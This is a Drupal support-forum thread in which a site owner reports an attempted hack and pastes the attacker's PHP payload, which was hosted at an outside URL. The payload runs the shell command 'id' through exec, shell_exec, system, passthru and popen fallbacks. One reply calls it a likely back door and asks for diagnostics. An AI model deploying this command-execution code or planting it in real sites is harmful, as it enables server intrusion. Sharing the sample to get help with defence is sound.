Someone Trying to Hack the Site
| Project: | Drupal |
| Version: | 5.8 |
| Component: | base system |
| Category: | support request |
| Priority: | critical |
| Assigned: | Unassigned |
| Status: | active |
Jump to:
Hi,
Someone is trying to hack our website with the code on the following URL.
http://www.cncascais.com/img/jpg.txt
I have even pasted the code here.
++++++++++++
<?php
echo "Mic22";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
exit;
+++++++++++++++
Anyone else having such issues.
What can be done ?
Regards
Gagandeep
#1
You can explain what you have seen. How does that code relate to your site?
It certainly looks like a back door for an exploit, but where have you found it? What diagnostics have you done so far?